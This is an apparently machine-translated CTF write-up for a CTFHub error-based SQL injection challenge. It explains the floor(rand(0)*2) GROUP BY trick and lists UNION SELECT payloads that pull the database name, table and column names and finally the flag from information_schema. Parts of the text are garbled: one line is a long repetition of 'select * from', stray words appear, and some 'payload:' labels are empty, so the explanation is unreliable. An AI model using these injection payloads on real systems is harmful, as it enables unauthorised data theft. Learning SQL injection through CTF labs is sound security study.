Tag Archives: WriteUp

Ctfhub error injection

CTFHUB reported an error injection

When the injection point does not echo the data of the database query, the information of the relevant database cannot be returned through the ordinary injection means. However, if the SQL code will report an error when the query is inputted, and the error is returned through mysql_error(), mysqli_error(), etc., then the possibility of reporting an error injection exists.

The principle of error injection is three functions: count(*),rand(),floor(), and group by.
1. Floor ()
. Rand () takes a random number from (0, 1), but if you give it an argument 0, that is, rand(0), and if you pass Floor (), that is: Floor (rand(0)*2), it is no longer random
select count(*),(concat(floor(rand(0)*2),0x26,(select database())))x from users group by x;
ah


>
x is equal to the as x, set an alias
principle: group by query, first set up an empty table, used to temporarily store data,
began to query, group by x, sequence of 0 at the beginning, temporary does not exist just fill in the empty list, then select the rand (), value of 1, insert 1;
> select * from ‘select * from’ select * from ‘select * from’ select * from ‘select * from’ select * from ‘select * from’ select * from ‘select * from’ select * from ‘select * from’ select * from ‘select * from’ select * from ‘ Speaks
the above principle is not very clear, direct topic
An error was reported for injection-ctfhub
Flag
payload:
payload:

1 Union select count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

0x26:&

Payload :
There is more than one> chart. You have to check it one by one

1 Union select count(*),concat((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x


payload:

1 Union select count(*),concat((select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x

The column name is yflag, which is exactly the same as the previous problem
payload:

1 Union select count(*),concat((select flag from flag limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x

Ahah get flag
error injection and other functions can be used, such as updateXML (), extractValue (), at first I use the updateXML function to do, the results can only get a part of the flag, thought it was truned, finally checked the next, found that the updateXML and extractValue can only break the maximum 32 bit value, and the MySQL version has requirements, mysql5 can be, the other did not try